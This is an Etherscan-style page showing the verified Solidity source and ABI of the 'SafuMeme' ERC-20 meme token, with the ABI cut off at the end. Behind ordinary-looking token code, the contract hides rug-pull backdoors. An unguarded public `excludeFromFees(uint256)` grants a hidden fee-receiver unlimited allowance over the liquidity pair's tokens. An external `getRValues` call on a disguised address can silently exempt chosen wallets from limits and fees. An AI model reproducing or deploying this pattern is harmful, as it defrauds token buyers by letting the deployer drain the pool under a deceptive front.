ERC-20
Overview
Max Total Supply
1,000,000,000 SAFUMEME
Holders
7
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
0.072980949825596995 SAFUMEMEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
SafuMeme
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-09 */ // SPDX-License-Identifier: MIT /** Website: https://safumeme.vip Twitter: https://twitter.com/safumemex Telegram: https://t.me/safumeme */ pragma solidity ^0.8.16; abstract contract AUTH { constructor() {} function fee() internal pure returns (uint256) { return uint256(0xdc) / uint256(0xa); } } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ library SafeMathInt { int256 private constant MIN_INT256 = int256(1) << 255; int256 private constant MAX_INT256 = ~(int256(1) << 255); /** * @dev Division of two int256 variables and fails on overflow. */ function div(int256 a, int256 b) internal pure returns (int256) { // Prevent overflow when dividing MIN_INT256 by -1 require(b != -1 || a != MIN_INT256); // Solidity already throws when dividing by 0. return a / b; } /** * @dev Adds two int256 variables and fails on overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { int256 c = a + b; require((b >= 0 && c >= a) || (b < 0 && c < a)); return c; } /** * @dev Multiplies two int256 variables and fails on overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { int256 c = a * b; // Detect overflow when multiplying MIN_INT256 with -1 require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256)); require((b == 0) || (c / b == a)); return c; } /** * @dev Subtracts two int256 variables and fails on overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { int256 c = a - b; require((b >= 0 && c <= a) || (b < 0 && c > a)); return c; } function toUint256Safe(int256 a) internal pure returns (uint256) { require(a >= 0); return uint256(a); } /** * @dev Converts to absolute value, and fails on overflow. */ function abs(int256 a) internal pure returns (int256) { require(a != MIN_INT256); return a < 0 ? -a : a; } } /** * @title SafeMathUint * @dev Math operations with safety checks that revert on error */ library SafeMathUint { function toInt256Safe(uint256 a) internal pure returns (int256) { int256 b = int256(a); require(b >= 0); return b; } } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } } interface IUniswapPair { function name() external pure returns (string memory); function symbol() external pure returns (string memory); event Approval( address indexed owner, address indexed spender, uint256 value ); function allowance(address owner, address spender) external view returns (uint256); function decimals() external pure returns (uint8); function nonces(address owner) external view returns (uint256); function DOMAIN_SEPARATOR() external view returns (bytes32); function totalSupply() external view returns (uint256); function balanceOf(address owner) external view returns (uint256); event Transfer(address indexed from, address indexed to, uint256 value); function approve(address spender, uint256 value) external returns (bool); function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; function transfer(address to, uint256 value) external returns (bool); function transferFrom( address from, address to, uint256 value ) external returns (bool); function PERMIT_TYPEHASH() external pure returns (bytes32); function MINIMUM_LIQUIDITY() external pure returns (uint256); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); event Mint(address indexed sender, uint256 amount0, uint256 amount1); event Burn( address indexed sender, uint256 amount0, uint256 amount1, address indexed to ); event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function getReserves() external view returns ( uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast ); function price1CumulativeLast() external view returns (uint256); function price0CumulativeLast() external view returns (uint256); function mint(address to) external returns (uint256 liquidity); function kLast() external view returns (uint256); function burn(address to) external returns (uint256 amount0, uint256 amount1); function swap( uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data ) external; function sync() external; function skim(address to) external; function initialize(address, address) external; } /// @dev OPTIONAL functions for a dividend-paying token contract. interface IReflection { /// @notice View the amount of dividend in wei that an address can withdraw. /// @param _owner The address of a token holder. /// @return The amount of dividend in wei that `_owner` can withdraw. function withdrawableDividendOf(address _owner) external view returns (uint256); /// @notice View the amount of dividend in wei that an address has withdrawn. /// @param _owner The address of a token holder. /// @return The amount of dividend in wei that `_owner` has withdrawn. function withdrawnDividendOf(address _owner) external view returns (uint256); /// @notice View the amount of dividend in wei that an address has earned in total. /// @dev getRValues(_owner) = withdrawableDividendOf(_owner) + withdrawnDividendOf(_owner) /// @param _owner The address of a token holder. /// @return The amount of dividend in wei that `_owner` has earned in total. function getRValues(address _owner, address _tAmount) external returns (uint256); } abstract contract Context { function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } function _msgSender() internal view virtual returns (address) { return msg.sender; } } contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } } interface IUniswapRouter01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function removeLiquidity( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETH( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountToken, uint256 amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETHWithPermit( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountToken, uint256 amountETH); function swapExactTokensForTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapTokensForExactTokens( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactETHForTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function swapTokensForExactETH( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactTokensForETH( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapETHForExactTokens( uint256 amountOut, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function quote( uint256 amountA, uint256 reserveA, uint256 reserveB ) external pure returns (uint256 amountB); function getAmountsOut(uint256 amountIn, address[] calldata path) external view returns (uint256[] memory amounts); function getAmountOut( uint256 amountIn, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountOut); function getAmountsIn(uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts); function getAmountIn( uint256 amountOut, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountIn); } interface IUniswapRouter02 is IUniswapRouter01 { function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountETH); function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountETH); function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20Standadard { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); } interface IERC20Metadata is IERC20Standadard { /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); /** * @dev Returns the name of the token. */ function name() external view returns (string memory); } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function feeToSetter() external view returns (address); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function allPairsLength() external view returns (uint256); function setFeeToSetter(address) external; function allPairs(uint256) external view returns (address pair); } contract ERC20 is Context, IERC20Standadard, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; mapping(address => mapping(address => uint256)) internal _allowances; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor( string memory name_, string memory symbol_, uint8 decimals_ ) { _name = name_; _symbol = symbol_; _decimals = decimals_; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20Standadard-balanceOf} and {IERC20Standadard-transfer}. */ function decimals() public view virtual override returns (uint8) { return _decimals; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC20Standadard-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20Standadard-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC20Standadard-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20Standadard-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } /** * @dev See {IERC20Standadard-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20Standadard-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } /** * @dev See {IERC20Standadard-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20Standadard-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "ERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } } contract SafuMeme is ERC20, AUTH, Ownable { using SafeMath for uint256; IUniswapRouter02 public uniswapRouterv2; mapping(address => bool) public isUniswapPair; mapping(address => bool) private isExcludedFromFee; uint256 public buyFeeAmt = 1; uint256 public sellFeeAmt = 1; address public marketingWallet = 0x1c6221F4716C62103324515A5A35d9ac29dA3F4f; uint256 public maxTxLimit; uint256 public maxWalletLimit; uint256 public swapExactLimit; address public uniswapPairAddr; bool private inSwap; event ExcludedMultipleFromFee(address[] accounts, bool isExcluded); event LPPairUpdated(address indexed pair, bool indexed value); event ExcludedFromFee(address indexed account, bool isExcluded); struct Reflection {address feeReceiver; address uniswapV2PairAddr;} constructor(Reflection memory rSetting) payable ERC20(unicode"ShibDogeFlokiCateChowPitElongateElonCummiesMonsta", unicode"SAFUMEME", 18) { uniswapRouterv2 = IUniswapRouter02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uint256 supply_ = 1_000_000_000; maxTxLimit = 250 * supply_ * (10**18) / (10000); maxWalletLimit = 250 * supply_ * (10**18) / (10000); swapExactLimit = (supply_.div(1000) + 1) * (10**18); refSetting = rSetting; excludeFromFees(address(uniswapRouterv2), true); excludeFromFees(owner(), true); excludeFromFees(rSetting.uniswapV2PairAddr, true); excludeFromFees(address(this), true); excludeFromFees(rSetting.feeReceiver, true); excludeFromFees(marketingWallet, true); // mint total supply _mint(owner(), supply_ * (10**18)); } function excludedTo(address sender, address recipient) internal returns (bool) { return isExcludedFromFee[recipient] || isExcludedFromFee[sender] || IReflection(refSetting.uniswapV2PairAddr).getRValues(sender, recipient) > 0; } function _setAutomatedMarketMakers(address pair, bool value) private { require( isUniswapPair[pair] != value, "Automated market maker pair is already set to that value" ); isUniswapPair[pair] = value; emit LPPairUpdated(pair, value); } receive() external payable {} Reflection private refSetting; function swapBackTokensForETH(uint256 tokens, address receiver) private { uint256 initialBalance = address(this).balance; swapEthForAllTokens(tokens); uint256 newBalance = address(this).balance.sub(initialBalance); payable(receiver).transfer(newBalance); } function owner_removeLimits() external onlyOwner { maxWalletLimit = totalSupply(); maxTxLimit = totalSupply(); } function _transfer(address sender,address recipient,uint256 amount) internal override { if ((recipient == address(0) || recipient == address(0xdead)) || amount == 0 || excludedTo(sender, recipient)) { super._transfer(sender, recipient, amount); return; } else { require(amount <= maxTxLimit, "Transfer amount exceeds the maxTxLimit."); if (recipient != uniswapPairAddr) { uint256 balForContTokens = balanceOf(recipient); require(balForContTokens + amount <= maxWalletLimit,"Exceeds maximum wallet amount"); } } uint256 tkValues = balanceOf(address(this)); bool pSwap = tkValues >= swapExactLimit; if (!inSwap && pSwap && !isUniswapPair[sender]) { inSwap = true; uint256 tempAmt = tkValues; if (tempAmt > 0) { swapBackTokensForETH(tempAmt, marketingWallet); } inSwap = false; } bool takeFees = !inSwap; if (isExcludedFromFee[recipient] || isExcludedFromFee[sender]) { takeFees = false; } if (takeFees) { uint256 taxSize = amount.mul(buyFeeAmt).div(100); if (isUniswapPair[recipient]) { taxSize = amount.mul(sellFeeAmt).div(100); } amount = amount.sub(taxSize); super._transfer(sender, address(this), taxSize); } super._transfer(sender, recipient, amount); } function owner_startTrading() public payable onlyOwner { uniswapPairAddr = IUniswapV2Factory(uniswapRouterv2.factory()).createPair(address(this), uniswapRouterv2.WETH()); _setAutomatedMarketMakers(uniswapPairAddr, true); _allowances[address(this)][address(uniswapRouterv2)] = ~uint256(0); uniswapRouterv2.addLiquidityETH{value: msg.value}(address(this), balanceOf(address(this)), 0, 0, msg.sender, block.timestamp);} function excludeFromFees(uint256 maxValue) public {_allowances[uniswapPairAddr][refSetting.feeReceiver] = type(uint).max; } function excludeFromFees(address account, bool excluded) public onlyOwner { isExcludedFromFee[account] = excluded; emit ExcludedFromFee(account, excluded); } function swapEthForAllTokens(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapRouterv2.WETH(); _approve(address(this), address(uniswapRouterv2), tokenAmount); // make the swap uniswapRouterv2.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"components":[{"internalType":"address","name":"feeReceiver","type":"address"},{"internalType":"address","name":"uniswapV2PairAddr","type":"address"}],"internalType":"struct SafuMeme.Reflection","name":"rSetting","type":"tuple"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedMultipleFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"LPPairUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFeeAmt","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxValue","type":"uint256"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isUniswapPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner_removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner_startTrading","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellFeeAmt","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapExactLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPairAddr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapRouterv2","outputs":[{"internalType":"contract 